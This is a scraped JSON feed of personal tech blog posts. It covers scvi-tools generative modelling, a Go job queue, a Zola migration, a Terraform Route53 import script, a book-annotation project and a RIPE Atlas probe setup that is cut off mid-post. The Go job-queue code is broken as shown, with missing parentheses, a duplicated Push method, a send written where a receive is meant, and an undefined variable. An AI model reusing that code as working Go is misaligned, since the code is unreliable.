\\mathcal{R}^{20000}Xc,g​∈R20000 containing read counts or UMIs\nof 20000 genes. A scRNA-seq datasets contains not one but a few thousand if not millions of cells.\nThe generative model’s task is to capture the underlying representation of these cells. \n“Representation” here is a loose term, but more formally given a  gene×cell\\text{gene} \\times \\text{cell}gene×cell \nmatrix whose distribution  Ptruth(X)P_{\\text{truth}}(X)Ptruth​(X) is unknown, the generative model tries to learn\na distribution  P(X)P(X)P(X)  which is as close to  Ptruth(X)P_{\\text{truth}}(X)Ptruth​(X)  as possible.\nIn order to obtain  P(X)P(X)P(X) , the model should be able to exploit the underlying structure in data.\nNeural networks are powerful functional approximators given their ability to capture non-linearities.\nVariational autoencoders utilize neural networks to build generative models that can approximate  Ptruth(X)P_{truth}(X)Ptruth​(X) \nin a decently quick fashion. The reason this works is because any $d$ dimensional distribution can\nbe approximated by starting with $d$ gaussian random variables and passing them through a complicated\nfunction (Devroye, 1986). A famous example of this is generating a 2D circle\nfrom a 2D gaussian blob.\n  Figure 1. \n    A 2D gaussian blob can be passed through a sufficiently complicated function g(z)=zα+z∣∣z∣∣g(z) = \\frac{z}{\\alpha} + \\frac{z}{||z||}g(z)=αz​+∣∣z∣∣z​ \n    to obtain a 2D ring.\n    \n\n\n\nscvi-tools also starts from a gaussian random variable and propogates it through its various layers\nsuch that the output count for a gene and a particular cells is close to its observed value. It\ndoes it over four main steps:\nGenerate a gaussian\nPass the gaussian through a neural network to approximate gene-cell proportions ($\\rho_{g,c}$)\nGenerate a count $y_{c,g}$ for each gene-cell using the estimated proportion in step 2 and and the total sequencing depth\nalong with an estimated dispersion $\\phi_g$.\nCalculate reconstruction error between generated count $y_{c,g}$ and observed count $x_{c,g}$\nThe aim is to minimize the reconstruction error in step 4 by optimizing the neural network weights and the estimated\nparameters $\\rho_{c,g}$ and $\\theta_g$.\nzc∼N(0,I)Cell embeddingρg,c∼softmax(fw(zc))Normalized expression yc,g∼NB(lcρc,g,ϕg)Observed counts\n\\begin{aligned}\n    {\\color{purple}z_c} &\\sim \\mathcal{N}(0,I) & \\text{\\color{purple}Cell embedding} \\\\\n    {\\color{red}\\rho_{g,c}} &\\sim \\text{softmax}(f_w(z_c)) & \\text{\\color{red}Normalized expression } \\\\\n    y_{c,g} &\\sim \\text{NB}({\\color{blue} l_c} {\\color{red}\\rho_{c,g}}, \\phi_g) & \\text{Observed counts} \n\\end{aligned}\nzc​ρg,c​yc,g​​∼N(0,I)∼softmax(fw​(zc​))∼NB(lc​ρc,g​,ϕg​)​Cell embeddingNormalized expression Observed counts​\nThe total sequencing depth for a cell can be also be learned by the network inherently, but the latest version (0.8.0) of\nscVI supports using observed library size. I started using observed library sizes before it became\npart of the implementation. The training time is faster and in my limited testing, the downstream clustering\nresults look slightly better with using observed library size, but it could also be due to other reasons.\nThe latent distribution $Z$ thus learned is a reduced dimensional latent reprsentation of the data. I will use [PBMC3k\ndataset] (https:\u002F\u002Fsupport.10xgenomics.com\u002Fsingle-cell-gene-expression\u002Fdatasets\u002F1.1.0\u002Fpbmc3k) for all the analysis here. We can do a \nUMAP visualization and the clusters tend to match up pretty well with ground truth, though there is possiblity\nof improvement.\n  Figure 1.\n      UMAP on the latent representation learned by scvi on PBMC3k dataset.\n    \n\n\n\nWe now have a $P(Y)$ and access to all intermediate values we can do a ton of things. But\nthe first thing would be to check if $P(Y)$ is indeed correct. One such way of performing validity checks on this\nmodel is posterior predictive checks (PPC). I learned of PPCs through Richard McElreath’s\nStatistical Rethinking (McElreath, 2020), which forms an integral part of all his discussions.\nThe idea of a PPC is very simple: simulate replicate data from the learned model and compare it to the observed.\nIn a way you are using your data twice, to learn the model and then using the learned model to check it against\nthe same data. A better designed check would be done on held out dataset, but it is perfectly valid to test\nthe model against the observations used to train the model.\nThe simplest checks for scRNA-seq counts is the mean-variance relationships. The simulated means and variances\nfrom the learned model should match that of the observed data on both a cell and a gene level.\nFigure 2. \n        Comparison of generated against observed means, variance and mean-variance relationships.\n      \nThe simulated mean-variance relationship aligns very well with the observed relationship.\nLet’s compare how the dispersion looks like:\nFigure 3. \n        Comparison of generated against observed means, variance and mean-variance.\n      \n \n    \n\n\nVariation with gene detection rate:\nFigure 4. \n        Comparison of generated against observed means, variance and mean-variance.\n      \n \n    \n\n\nThe loss function being minizmied to infere the parameters minimizes the reconstruction loss between generated counts \n$X$ and observed counts $Y$.\nFigure 5. \n        Comparison of generated against observed means, variance and mean-variance.\n      \n \n    \n\n\nOne thing I still need to wrap around my head is how much informative the reconstruction error itself is. For example, a UMAP\nof this reconstruction error mimics that of the latent representation:\nFigure 5. \n        Comparison of generated against observed means, variance and mean-variance.\n      \n \n    \n\n\n\nLopez, R., Regier, J., Cole, M. B., Jordan, M. I., & Yosef, N. (2018). Deep generative modeling for single-cell transcriptomics. Nature Methods, 15(12), 1053–1058.\nDevroye, L. (1986). Sample-based non-uniform random variate generation. Proceedings of the 18th Conference on Winter Simulation, 260–265.\nMcElreath, R. (2020). Statistical rethinking: A Bayesian course with examples in R and Stan. CRC press.\nMa, S., Zhang, B., LaFave, L. M., Earl, A. S., Chiang, Z., Hu, Y., Ding, J., Brack, A., Kartha, V. K., Tay, T., & others. (2020). Chromatin potential identified by shared single-cell profiling of RNA and chromatin. Cell, 183(4), 1103–1116.",[],{"slug":2136,"title":2137,"link":2138,"pubDate":2139,"contentSnippet":2140,"tags":2141,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"job-queue-golang","Designing a simple Job Queue in Golang","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fjob-queue-golang\u002F","2020-12-01T02:40:55.000Z","In this post we’ll see how to create a simple job queue in Golang. There are tonnes of libraries and posts out there doing overly complicated stuff, however if your need is pretty minimal or you want to understand the concepts from ground up, this post aims to do just that and nothing more.\nWe’ll be using concepts like WaitGroup, Channels and Contexts to build our own Job Queuing mechanism. It primarily involves 2 components:\nQueue: A queue which has a list of items waiting to be processed.\nWorker: A worker constantly listening to that queue and processing the events as desired.\nWith these 2 main ideas behind us, let us create our sample structure:\npackage dispatch\n\ntype Dispatcher interface {\n\t\u002F\u002F Push takes an Event and pushes to a queue.\n\tPush(Event) error\n\t\u002F\u002F Run spawns the workers and waits indefinitely for\n\t\u002F\u002F the events to be processed.\n\tRun()\n}\n\n\u002F\u002F EventDispatcher represents the datastructure for an\n\u002F\u002F EventDispatcher instance. This struct satisfies the\n\u002F\u002F Dispatcher interface.\ntype EventDispatcher struct {\n\tOpts     Options\n\tQueue    chan models.Notification\n\tFinished bool\n}\n\n\u002F\u002F Options represent options for EventDispatcher.\ntype Options struct {\n\tMaxWorkers int \u002F\u002F Number of workers to spawn.\n\tMaxQueueSize int \u002F\u002F Maximum length for the queue to hold events.\n}\n\n\u002F\u002F NewEventDispatcher initialises a new event dispatcher.\nfunc NewEventDispatcher(opts Options) (Dispatcher) {\n\treturn EventDispatcher{\n\t\tOpts: opts,\n\t\tQueue: make(chan Event, opts.MaxQueueSize),\n\t\tFinished: false,\n\t}\n}\nPushing to Queue#\nNow that we have our basic structure ready, let’s write a function to push events to queue.\nA queue is simply a channel. We have created a new queue of size MaxQueueSize while initialising the EventDispatcher.\nQueue: make(chan Event, opts.MaxQueueSize)\nTo push events into it, we’ll simply do: d.Queue \u003C- event. This adds a new item (event) of type Event to our queue.\n\u002F\u002F Push adds a new event payload to the queue.\nfunc (d *EventDispatcher Push(event Event) error {\n\tif d.Finished {\n\t\treturn errors.New(`queue is closed`)\n\t}\n\td.Queue \u003C- event\n\treturn nil\n}\nListening to Queue#\nSo the client is calling Push() on our EventDispatcher and events are being pushed in the channel. But there’s no one reading from this channel so far. Let’s fix that by spawning workers, who will listen on the channel indefinitely and process the events:\nfor {\n    select {\n        case event \u003C- d.Queue:\n        event.Process()\n    }\n}\nIn the above snippet, we are simply looping indefinitely to scan through all items in the queue. event \u003C- d.Queue is basically fetching the item from the channel and assigning a value to it.\nevent.Process() is a dummy function but it basically indicates that whatever processing that needs to be done should be handled here.\nRight now, you’ll be wondering two things:\nIf this is an infinite loop, how do we guarantee it runs forever?\nHow do I spawn more workers if I need concurrency?\nTo address these problems, let’s add in WaitGroups and GoRoutines to our mix.\nWaitGroups will help us keep a count of workers which have been spawned and until each one of them finishes processing, wait groups will keep blocking indefinitely using wg.Wait().\nAnd to bring in more workers, we’ll simply spawn them with GoRoutines:\ngo func() {\n\tfor {\n\t  select {\n\t    case event \u003C- d.Queue:\n\t\tevent.Process()\n\t  }\n\t}\n}()\nNow, spawning n Goroutines is just a matter of a simple for loop over this:\nfor i:=0; i\u003Cd.Opts.MaxWorkers; i++{\n\twg.Add(1) \u002F\u002F Add a wait group for each worker\n\tgo func() {\n\t\tfor {\n\t\tselect {\n\t\t\tcase event \u003C- d.Queue:\n\t\t\tevent.Process()\n\t\t}\n\t\t}\n\t}()\n}\nPerfect! But hang on! We have missed a critical thing. How do we handle cancellations? For eg, when your program shuts down, we should clean up all the Goroutines spawned and process the remaining messages in queue. For that, we need to listen to a Cancellation channel. The only purpose of this channel is to listen for SIGINT or SIGTERM signals and whenever either of them is received, we should flush our events.\nHere’s how the client would initialise a context:\n\u002F\u002F Create a channel to relay `SIGINT` and `SIGTERM` signals.\ncloseChan := make(chan os.Signal, 1)\nsignal.Notify(closeChan, os.Interrupt, syscall.SIGTERM)\nctx, cancel := context.WithCancel(context.Background())\nAnd in the main thread, the client would block on closeChan channel like:\n\u002F\u002F Listen on close channel indefinitely until a\n\u002F\u002F `SIGINT` or `SIGTERM` is received.\n\u003C-closeChan\n\u002F\u002F Cancel the context to gracefully shutdown.\ncancel()\nWhen cancel() is called, it does something special. It passes a value to ctx.Done() channel. We can listen to this channel in the .Run() function and flush pending events accordingly:\ncase \u003C- ctx.Done():\n\t\u002F\u002F Ensure no new messages are added.\n\td.Finished = true\n\t\u002F\u002F Flush all events.\n\te.Flush()\n\t\u002F\u002F This Goroutine has finished processing.\n\twg.Done()\nStitching all pieces together, we finally have:\npackage dispatch\n\ntype Dispatcher interface {\n\t\u002F\u002F Push takes an Event and pushes to a queue.\n\tPush(Event) error\n\t\u002F\u002F Run spawns the workers and waits indefinitely for\n\t\u002F\u002F the events to be processed.\n\tRun()\n}\n\n\u002F\u002F EventDispatcher represents the datastructure for an\n\u002F\u002F EventDispatcher instance. This struct satisfies the\n\u002F\u002F Dispatcher interface.\ntype EventDispatcher struct {\n\tOpts     Options\n\tQueue    chan models.Notification\n\tFinished bool\n}\n\n\u002F\u002F Options represent options for EventDispatcher.\ntype Options struct {\n\tMaxWorkers int \u002F\u002F Number of workers to spawn.\n\tMaxQueueSize int \u002F\u002F Maximum length for the queue to hold events.\n}\n\n\u002F\u002F NewEventDispatcher initialises a new event dispatcher.\nfunc NewEventDispatcher(opts Options) (Dispatcher) {\n\treturn EventDispatcher{\n\t\tOpts: opts,\n\t\tQueue: make(chan Event, opts.MaxQueueSize),\n\t\tFinished: false,\n\t}\n}\n\n\u002F\u002F Push adds a new event payload to the queue.\nfunc (d *EventDispatcher Push(event Event) error {\n\tif d.Finished {\n\t\treturn errors.New(`queue is closed`)\n\t}\n\td.Queue \u003C- event\n\treturn nil\n}\n\n\u002F\u002F Run spawns workers and listens to the queue\n\u002F\u002F It's a blocking function and waits for a cancellation\n\u002F\u002F invocation from the Client.\nfunc (d *EventDispatcher Run(ctx context.Context) {\n\twg := sync.WaitGroup{}\n\tfor i := 0; i \u003C d.Opts.MaxWorkers; i++ {\n\t\twg.Add(1) \u002F\u002F Add a wait group for each worker\n\t\t\u002F\u002F Spawn a worker\n\t\tgo func() {\n\t\t\tfor {\n\t\t\t\tselect {\n\t\t\t\tcase \u003C-ctx.Done():\n\t\t\t\t\t\u002F\u002F Ensure no new messages are added.\n\t\t\t\t\td.Finished = true\n\t\t\t\t\t\u002F\u002F Flush all events\n\t\t\t\t\te.Flush()\n\t\t\t\t\twg.Done()\n\t\t\t\t\treturn\n\t\t\t\tcase e \u003C- d.Queue:\n\t\t\t\t\te.Process()\n\t\t\t\t}\n\t\t\t}\n\t\t}()\n\t}\n\twg.Wait()\n}\n\n\u002F\u002F Push adds a new event payload to the queue.\nfunc (d *EventDispatcher Push(event Event) error {\n\tif d.Finished {\n\t\treturn errors.New(`queue is closed`)\n\t}\n\td.Queue \u003C- event\n\treturn nil\n}\nThis post doesn’t cover how to flush or process the events as these are implementation specific details.\nThis is a pretty barebones structure and you can modify the code according to your usecase.\nFin!",[],{"slug":2143,"title":2144,"link":2145,"pubDate":2146,"contentSnippet":2147,"tags":2148,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"fantastic-beasts-graffiti","Writing on books - Fantastic Beasts and Where to Find Them","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2020\u002F11\u002F29\u002Ffantastic-beasts-graffiti\u002F","2020-11-29T00:00:00.000Z","“Fantastic Beasts and Where to Find Them” is a curious book:\nThe in-universe book is written by Newt Scamander and was published in 1927.\nThe first edition of the companion book was published in 2001. This is apparently the 52nd in-universe edition with a foreword from Dumbledore and was released to the muggle world for charity.\nThe 2001 edition pretends to be Harry’s copy of the book as of the end of Harry’s 4th year at Hogwarts. As such it includes hand-written comments from the trio. (Yes, Hermione writes on books!)\nHowever, with the release of the film of the same name in 2016 - a new edition was released with lots of changes:\n6 new beasts that made an appearance in the film were added to the book1:\n    \nHidebehind\nHodag\nHorned Serpent\nSnallygaster\nThunderbird\nWampus cat\nThe hand-lettering was removed.\nDumbledore’s foreword is removed from the book, in favor of a in-universe foreword from Newt Scamander.\n“About the Author” section changes Newt’s background. He no longer graduates from Hogwarts, just “leaves” it, as portrayed in the film.\nAll of these changes are meant to fix the inconsistencies in the book with the canon, however that also makes the book much less charming. I got myself a copy of the Hogwarts Library boxset a few years ago, which includes the newer edition of the book (Bloomsbury) - that means no witty comments from Ron.\nSince it didn’t have the hand-lettering, I took it upon myself to fix that mistake. Thankfully, lists of all the comments in 2001 edition are available on the internet. The trickiest part was the “this book belongs to” page, which is missing from the newer edition. I ended up creating a faux-library card for that instead.\nHere is what it looks like:\n\nRon plays hangman and loses.\n\n      \n\nHermione writes on books!\n\n      \n\nThanks to Bhavya for helping with the troll illustration.\nI didn’t like the new additions, they sound less like a textbook and more like a transcript of what happened in the film. ↩",[],{"slug":2150,"title":2151,"link":2152,"pubDate":2153,"contentSnippet":2154,"tags":2155,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"analysis-paralysis","Analysis Paralysis - CrashLoopBackoff","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fanalysis-paralysis\u002F","2020-11-27T02:40:55.000Z","Have you ever been stuck in a situation where you’ve spent countless hours digging through lot of options, overthinking their pros\u002Fcons and having a tough time to decide?\nIf yes, I’ve been in the same boat myself and the more I think about this, I think it’s causing some serious issues in my productivity. Since I’ve started to self host a lot of services, I’m overthinking and overanalysing the software choices available to do a certain task. For eg, a personal wiki, sounds such a simple and common use case but I’ve personally tried countless choices. I’ve read and searched for these discussions on lobster\u002FHN\u002FReddit discussions boards and that has been a real time sink for me, now that I look back. I’ll try an option for maybe a week or two at best and then jump on to something else in search of the perfect solution.\nIt’s hard for me to stick to a solution. And it’s even more embarassing when you tell your friends about the “latest new distro” you’re using, announce it to the world on Twitter and when someone asks, “hey how’s that OS working for you” after a month, you tell them “Oh, I switched from it last week”. I’m not making any of this up, I’ve been in these shoes myself and honestly it’s not a good feeling.\nIn the search of perfect I tend to lose sight of things that are important. Things which are slow, boring but they work are more reliable than a software which changes fast and breaks often. I want to fail cheap and quickly rather than spending a lot of time and still eventually failing.\nNo, this post doesn’t have any answers on how to fix this problem. Well, if I myself knew then I’d not be writing this but giving a TEDx talk on it. These are just my observations and something that I intend to actively fix.\nBoring is better. I want to stick to stable choices when it comes to trivial things in life. I don’t wanna seek excitement or joy from switching to a cool new distro. Instead, by actually doing some important project at my work or building my side projects, something that gives me a genuine feeling of happiness. After all grass always seems to look greener on the other side.\nI don’t usually pen down my thoughts like these, but I want to refer to this public post as a reminder for myself the next time I’m about to make the same mistake.\nFin.\nUPDATE (2021-11-02): There’s a really nice video I came across today on the same subject. I’d highly recommend you to give this a listen if you found the above post relatable.",[],{"slug":2157,"title":2158,"link":2159,"pubDate":2160,"contentSnippet":2161,"tags":2162,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"migrating-to-zola","Migrating my blog to Zola","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fmigrating-to-zola\u002F","2020-11-08T02:40:55.000Z","I’ve been writing on this blog for about 2 years now. This has been the longest I’ve stuck on to the same technology stack for my blog. I’ve previously jumped from a Jekyll based static site to a Medium blog before finally settling for Hugo.\nI’ve been using Hugo since 2018 but I don’t recall as to why I went ahead with it. Maybe it was increasingly popular at that time and everyone touted Hugo as the solution to Static Site Generator (referred to as SSG from here on). There are 1000s of SSGs and at least a dozen of websites which lists all the SSGs out there. This is crazy by any standards. Hugo started as a generic blog generator but over the years it has become a website generator. It’s no longer aimed at people who just want to have a small little static website\u002Fblog but supports all the use cases for people building full-fledged static websites. IMHO these two goals are overarching however this has resulted in a simple project to become incredibly complex over time.\nTipping Point#\nAnyway, so I wanted to change the look of the homepage on my website so I decided to look at Hugo’s documentation. Hugo’s documentation is great for someone who knows what exactly are they looking for. The documentation is so huge that you simply cannot grok it in one evening. I had zero ideas on how to customise the damn homepage of my blog and after spending hours buried in the documentation I was able to kind of figure the solution but it was unintuitive, to say the least. Apparently, to override any template from the theme, you have to mirror the directory structure of the theme in your root directory. Which meant, I needed to look at the source code of the theme, figure out the project structure, copy-paste all the folder names and put my override of index.html there. Which, BTW magically overrides it. This whole magic thing is BS and I am being strongly opinionated here.\nThere is more than one way to do something in Hugo. Different theme authors use different styles, which makes the whole thing even more complex. It also means for my customisations to work across themes, well you guessed it right: it’s impossible.\nRecently I discovered that I was unable to preview my Hugo website locally without internet because I had a Twitter shortcode in one of my blog post (which makes an API call to Twitter to render a nice card preview). The site completely failed to render instead of just logging a warning. Bollocks.\nThe tipping point for me, however, was when the theme I was using stopped working with the latest version of Hugo at that point. So, picture this – You make dozens of custom changes and then one update just breaks your website. Now not only you have to fix your shit but the theme you were using, you’ve to make upstream changes to the theme or maintain your own fork. And no, this is not a one-off experience. Hugo upgrades are a joke, they are known to break very very often.\nI was done at this point. I didn’t want to deal with this BS of continuously fighting the generator for my blog.\nA fresh change#\nBeing a practitioner of Yak Shaving, I discussed the idea of a “tinyhugo” with Kailash and Sarat. We’d arrived at a spec and I started writing some code to pander to my NIH syndrome.\nHowever, I was still not convinced that a simpler solution doesn’t exist. I spent countless hours exploring other alternatives. I’d used Lektor, Pelican, Eleventy before finally stumbling upon Zola from HN\u002FLobster discussions. I’ve got to say, the landing page gave a fresh feeling - one that I’ve not seen with any other alternatives. In fact quite opposite to the Eleventy landing page which looks like an over-engineered piece of software to generate websites (Not hating on it, there might be use cases for it, but the JS tooling and dependency system is something that I would not want to touch with a 10ft pole).\nZola’s primary appeal to me was that like Hugo it’s extremely fast and comes as a single binary no dependency package. I looked at the docs the first impression was they are concise enough to get a basic idea. Zola is strongly opinionated, even to the extent of dictating a project structure and sometimes filenames too. I actually preferred this over the magic Hugo does. In less than 2 hours I was able to port the home page of my blog (and tweak it to my liking) in Zola. I decided to abandon my own tinyhugo attempt because for the very fact Zola fits my needs very well.\nThe thing that I really loved about Zola is how it enforces a separation between Section and Pages. The section represents a “collection” of posts. So a blog can be a section, and I can have another section called “Book Reviews”. I could easily tell Zola where to look for the templates by specifying the same in content\u002Fbook_reviews\u002F_index.md. I don’t have to read Hugo docs or do Google-fu to figure this out, it’s right there in the docs and very apparent.\nFor the record, I still don’t know how to customise different templates for different sections in Hugo, but I couldn’t care less.\nMigration#\nThe migration was pretty straightforward – I had to copy the content folders of my blog (which are just a bunch of .md files) and replace YAML frontmatter to TOML. There were a few variable changes that I needed to do manually but since they were a manageable 20-25 posts, I did it by hand. I could potentially automate but then rabbit deep in the rabbit hole of Yak Shaving. The good part was that I was able to retain the same URL structure for my new blog because the URL scheme was based on the file paths.\nI spent some time porting hugo-ink to Zola and did minor CSS tweaks to it. Zola uses the Tera language for templating and it’s much more pleasing to eyes than the Go Template syntax. Zola comes with pretty neat features like Search, RSS\u002FAtom Feeds, Syntax Highlighting and SASS->CSS Processors.\nWhat took me time however was to figure out how to get opengraph tags in each page. Hugo provides nifty template for this use case but Zola is pretty barebones like that. People who care a lot about SEO need to spend some extra efforts here.\nFuture#\nZola is still a pretty new kid on the block but the author shares the same frustration about Hugo:\nit personally drives me insane, to the point of writing my own template engine and static site generator. Yes, this is a bit biased. – Source\nThis also reflects in the issues\u002FPRs I’ve seen for Zola and the author is opinionated about not adding features which would make Zola complicated. Overall I am very happy with the switch and it was long due. I feel more confident in tweaking certain sections of my website. I plan to open-source the current theme in the next few days.\nYou can read the Source Code of this website if you’d like to explore how this website is built.\nFin!",[],{"slug":2164,"title":2165,"link":2166,"pubDate":2167,"contentSnippet":2168,"tags":2169,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"terraform-route53-import","Import existing Route53 records in Terraform","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fterraform-route53-import\u002F","2020-10-18T02:40:55.000Z","Terraform has a straightforward way of importing existing records (managed outside Terraform) via terraform import command. The usage is documented here and works well if you have a handful of records to import. However when you work with custom Terraform modules and have a whole bunch of records to be imported, you’d look out ways to script the entire workflow. I did this a few weeks back at work and thought to share a solution which works well for my usecase.\nHow it works#\nThe task consists of 3 parts:\n1. Import all existing records in a hosted zone using AWS CLI.#\naws route53 list-resource-record-sets --hosted-zone-id XXX > data\u002Fcompany-tld.json\n# Loads the zone records in a dict\ndef load_records(zone_file=ZONE_FILE):\n    with open(zone_file) as record_file:\n        data = json.load(record_file)\n    return data\n2. Import the record in Terraform state.#\nTo do this, Terraform CLI comes with an import command. However for import to work, you need to have a resource declaration in your Terraform file already.\nFrom the official documentation:\nBecause of this, prior to running terraform import it is necessary to write manually a resource configuration block for the resource, to which the imported object will be mapped.\nTo overcome this restriction, we will create a dummy.tf and programatically write the configuration block for each record.\n# Writes the dummy Terraform template which is required\n# before `terraform import` runs.\ndef template_dummy_file(resource_name):\n    add_dummy_record = Template(\n        \"\"\"\n\tresource \"aws_route53_record\" \"$resource_name\" {\n\t# (resource arguments)\n\t}\n\t\"\"\"\n    )\n    dummy_file_path = path.join(TERRAFORM_DIR, \"dummy.tf\")\n    with open(dummy_file_path, \"a\") as f:\n        f.write(add_dummy_record.substitute(resource_name=resource_name))\nAWS Route53 module can import aws_route53_record as decsribed here. We will run this command as a subprocess.\n# Shells out `terraform import` command in the host OS.\ndef terraform_import(resource_name, resource_type):\n    import_command = f\"terraform import aws_route53_record.{resource_name} {ZONE_ID}_{resource_name}_{resource_type}\"\n    run(import_command, shell=True, check=True)\n3. (Optional) Move Resources in a Module#\nIn case you are using a Module to manage AWS Route53 resources, you’ll need to move the declaration from resource to module configuration block. This is described more in detail here.\nThe module declaration\u002Fnaming would depend on how the module is configured. To demonstrate, the module I use internally requires the name to be of the format resource_name-resource_type. To achieve this, you can call terraform state mv as a subprocess:\n# Shells out `terraform state mv` command in the host OS.\ndef terraform_move(resource_name, resource_type):\n    mv_command = f\"terraform state mv aws_route53_record.{resource_name} 'module.{MODULE_NAME}.aws_route53_record.route53_record[\\\"{resource_name}-{resource_type}\\\"]'\"\n    run(mv_command, shell=True, check=True)\nThat’s it! Running terraform plan should now show you the changes and if you imported every record correctly you should not see any drift from the real world state.\nYou can view the entire script here:\nimport json\nfrom os import getenv, path\nfrom string import Template\nfrom subprocess import run\nfrom sys import exit\n\n\nZONE_ID = getenv(\"ZONE_ID\")\nMODULE_NAME = getenv(\"MODULE_NAME\")\nZONE_FILE = getenv(\"ZONE_FILE\")\nTERRAFORM_DIR = getenv(\"TERRAFORM_DIR\")\n\n# Returns the variable key if not present in ENV.\ndef check_env_vars():\n    if not ZONE_FILE:\n        return \"$ZONE_FILE\"\n    if not ZONE_ID:\n        return \"$ZONE_ID\"\n    if not MODULE_NAME:\n        return \"$MODULE_NAME\"\n    if not TERRAFORM_DIR:\n        return \"$TERRAFORM_DIR\"\n    return \"\"\n\n\n# Loads the zone records in a dict\ndef load_records(zone_file=ZONE_FILE):\n    with open(zone_file) as record_file:\n        data = json.load(record_file)\n    return data\n\n\n# Writes the dummy Terraform template which is required\n# before `terraform import` runs.\ndef template_dummy_file(resource_name):\n    add_dummy_record = Template(\n        \"\"\"\n\tresource \"aws_route53_record\" \"$resource_name\" {\n\t# (resource arguments)\n\t}\n\t\"\"\"\n    )\n    dummy_file_path = path.join(TERRAFORM_DIR, \"dummy.tf\")\n    with open(dummy_file_path, \"a\") as f:\n        f.write(add_dummy_record.substitute(resource_name=resource_name))\n\n\n# Shells out `terraform import` command in the host OS.\ndef terraform_import(resource_name, resource_type):\n    import_command = f\"terraform import aws_route53_record.{resource_name} {ZONE_ID}_{resource_name}_{resource_type}\"\n    run(import_command, shell=True, check=True)\n\n\n# Shells out `terraform state mv` command in the host OS.\ndef terraform_move(resource_name, resource_type):\n    mv_command = f\"terraform state mv aws_route53_record.{resource_name} 'module.{MODULE_NAME}.aws_route53_record.route53_record[\\\"{resource_name}-{resource_type}\\\"]'\"\n    run(mv_command, shell=True, check=True)\n\n\nif __name__ == \"__main__\":\n    missing = check_env_vars()\n    if missing:\n        exit(f\"Required env variable {missing} is missing.\")\n    records = load_records()\n    for i in records.get(\"ResourceRecordSets\"):\n        resource_name = i.get(\"Name\")\n        resource_type = i.get(\"Type\")\n        template_dummy_file(resource_name)\n        terraform_import(resource_name, resource_type)\n        terraform_move(resource_name, resource_type)\n        print(f\"Imported {resource_name}\")\nHope this tiny Python script helps you transition your AWS Route53 records neatly and effortlessly!\nFin!",[],{"slug":2171,"title":2172,"link":2173,"pubDate":2174,"contentSnippet":2175,"tags":2176,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"ripe-atlas-probe-setup","Setting up a RIPE Atlas Probe","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fripe-atlas-probe-setup\u002F","2020-10-03T02:40:55.000Z","Twitter is an amazing thing! For all the shitposting and meme-ing that’s done there, there are some really cool people you get to interact with which wouldn’t have been possible IRL. I happened to stumble upon Swapneel last year in Bangalore at a meetup. He occasionally posts about RIPE Atlas Probes measurements on his Twitter feed and that made me curious and learn more about the Atlas Probe. Call it the Baader-Meinhof effect but just when I was reading his blog post on RIPE Atlas, I found about a Hasgeek workshop which is being conducted by Swapneel himself and well, that’s how I basically got interested in setting up a probe myself.\nWhat is RIPE Atlas Probe#\nA Probe is a device used to measure various metrics like DNS, SSL\u002FTLS, NTP, ping, traceroute etc for an upstream target. A network of such probes is useful not just to internet researchers, network engineers, ISP operators, public activists but also to common folks like me who are simply curious about the network\u002FWWW in general. The idea behind this is simple – you get some virtual credits for hosting a probe. You can make use of these credits to run your own measurements to gain insights about the health of your network. The data from these measurements are made publicly available by RIPE NCC and anyone can see these results.\nThere are 2 ways to host a Probe: Software and Hardware. Since the start of this year, RIPE Atlas is available as software packages for various platforms. Before this, the only way to set up a Probe was to host a Hardware probe by applying for one at RIPE NCC website. These hardware probes are not shipping to India since quite some time as Swapneel mentioned and if you’re in India, your only choice, for now, is to set up a software probe. A few key differences in the 2 kinds of probes:\nInitial Setup: Hardware probe is a plug-n-play device, no setup required. That makes it attractive for a lot of people, to just get a small device and host it.\nSpare Compute: For hosting a probe it is recommended that the probe stays online for as long as possible. This means you need to have a spare compute lying around, like a RaspebrryPi, a VM, a server etc. It’s not really recommended to host a probe on your laptop\u002Fdesktop - something which has ad-hoc usage pattern. For people who don’t have any spare compute, a hardware probe is more suited for them.\nTampering Result: With the software probe, there are easy ways of tampering the measurement result, which might give a bad data point to people running the measurements. For eg, a software probe could tamper with the DNS queries for a particular upstream and fool you to believe that there’s a problem with the uplink or the upstream target.\nYou can read more about Probes here and this FAQ section is highly recommended to clear all the basic doubts you might have about Probes.\nSetting up a Software Probe in a Container#\nWell, Containers are awesome! It’s easier to do a docker run than figure out the installation instructions for your OS, ensure dependencies are installed and insert 10 other things you have to do. So, I decided to use jamesits\u002Fripe-atlas Docker image to host a probe on my RPi 4.\nHowever, in case you don’t want to use Containers for a reason best known to you, you can visit the official docs and find out instructions for your platform.\nYou can follow the below steps to set up a probe via Docker:\n1. Create a RIPE NCC Account#\nYou need to register for a RIPE NCC Access Account before proceeding further. Visit the registration page and create an account.\n2. Start the container#\ndocker run --detach --restart=always --log-opt max-size=10m \\\n        --cap-add=SYS_ADMIN --cap-add=NET_RAW --cap-add=CHOWN \\\n        --mount type=tmpfs,destination=\u002Fvar\u002Fatlasdata,tmpfs-size=64M \\\n        -v \u002Fvar\u002Fatlas-probe\u002Fetc:\u002Fvar\u002Fatlas-probe\u002Fetc \\\n        -v \u002Fvar\u002Fatlas-probe\u002Fstatus:\u002Fvar\u002Fatlas-probe\u002Fstatus \\\n        -e RXTXRPT=yes \\\n        --name ripe-atlas --hostname \"$(hostname --fqdn)\" \\\n        jamesits\u002Fripe-atlas:latest\nNOTE: In the above case, since I am running the Probe on my RPi which is why I am using latest-armv7l tag for the jamesits\u002Fripe-atlas image. In case you are doing this on an amd64 machine, you should use the latest tag only. You can find more options for the container here.\n3. Apply for a Software Probe#\nYou need to register for a software probe here and fill in the details as mentioned below.\n\nASN: You can find the ASN of your public IP by visiting ip2asn.com. You need to enter your public IP here which you can find it by visiting ifconfig.co.\n\nPublic Key: You need to fill the public key generated by your Probe:\ncat \u002Fvar\u002Fatlas-probe\u002Fetc\u002Fprobe_key.pub\nNote: We are mounting the 